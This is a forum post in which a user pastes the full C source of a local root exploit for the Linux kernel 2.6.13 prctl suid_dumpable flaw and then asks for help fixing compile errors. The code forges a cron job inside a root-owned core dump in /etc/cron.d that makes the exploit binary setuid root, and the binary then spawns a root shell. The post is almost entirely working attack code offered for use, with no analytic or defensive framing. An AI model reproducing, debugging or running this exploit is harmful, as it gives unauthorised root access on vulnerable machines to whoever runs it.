Code:
:cryin:/* Linux >= 2.6.13 prctl kernel exploit
 *
 * (C) Julien TINNES
 *
 * If you read the Changelog from 2.6.13 you've probably seen:
 *  [PATCH] setuid core dump
 * 
 * This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per process,
 * user setable argument to PR_SET_DUMPABLE.
 * 
 * This flaw allows us to create a root owned coredump into any directory.
 * This is trivially exploitable.
 *
 */

#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/prctl.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <signal.h>
#include <stdlib.h>
#include <time.h>

#define CROND "/etc/cron.d"
#define BUFSIZE 2048


struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY};

char    crontemplate[]=
"#/etc/cron.d/core suid_dumpable exploit\n"
"SHELL=/bin/sh\n"
"PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
"#%s* * * * *    root     chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n";

char    cronstring[BUFSIZE];
char    fname[BUFSIZE];

struct timeval te;

void sh(int sn) {
    execl(fname, fname, (char *) NULL);
}
    

int    main(int argc, char *argv[]) {

    int nw, pid;

    if (geteuid() == 0) {
        printf("[+] getting root shell\n");
        setuid(0);
        setgid(0);
        if (execl("/bin/sh", "/bin/sh", (char *) NULL)) {
            perror("[-] execle");
            return 1;
        }
    }

    printf("\nprctl() suidsafe exploit\n\n(C) Julien TINNES\n\n");

    /* get our file name */
    if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) {
        perror("[-] readlink");
        printf("This is not fatal, rewrite the exploit\n");
    }

    if (signal(SIGUSR1, sh) == SIG_ERR) {
        perror("[-] signal");
        return 1;
    }
    printf("[+] Installed signal handler\n");

    /* Let us create core files */
    setrlimit(RLIMIT_CORE, &myrlimit);
    if (chdir(CROND) == -1) {
        perror("[-] chdir");
        return 1;
    }

    /* exploit the flaw */
    if (prctl(PR_SET_DUMPABLE, 2) == -1) {
        perror("[-] prtctl");
        printf("Is you kernel version >= 2.6.13 ?\n");
        return 1;
    }

    printf("[+] We are suidsafe dumpable!\n");

    /* Forge the string for our core dump */
    nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid());
    if (nw >= sizeof(cronstring)) {
        printf("[-] cronstring is too small\n");
        return 1;
    }
    printf("[+] Malicious string forged\n");

    if ((pid=fork()) == -1) {
        perror("[-] fork");
        return 1;
    }

    if (pid == 0) {
        /* This is not the good way to do it ;) */
        sleep(120);
        exit(0);
    }

    /* SEGFAULT the child */
    printf("[+] Segfaulting child\n");
    if (kill(pid, 11) == -1) {
        perror("[-] kill");
        return 1;
    }
    if (gettimeofday(&te, NULL) == 0) 
        printf("[+] Waiting for exploit to succeed (~%ld seconds)\n", 60 - (te.tv_sec%60));
    sleep(120);

    printf("[-] It looks like the exploit failed\n");

    return 1;
}
/ I wrot by linux in the terminl it's take for me message some cood problems
struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY};

please and please and please help meeeeeeeeeeeee

Last edited by shabbir; 9Aug2009 at 16:58.. Reason: Code blocks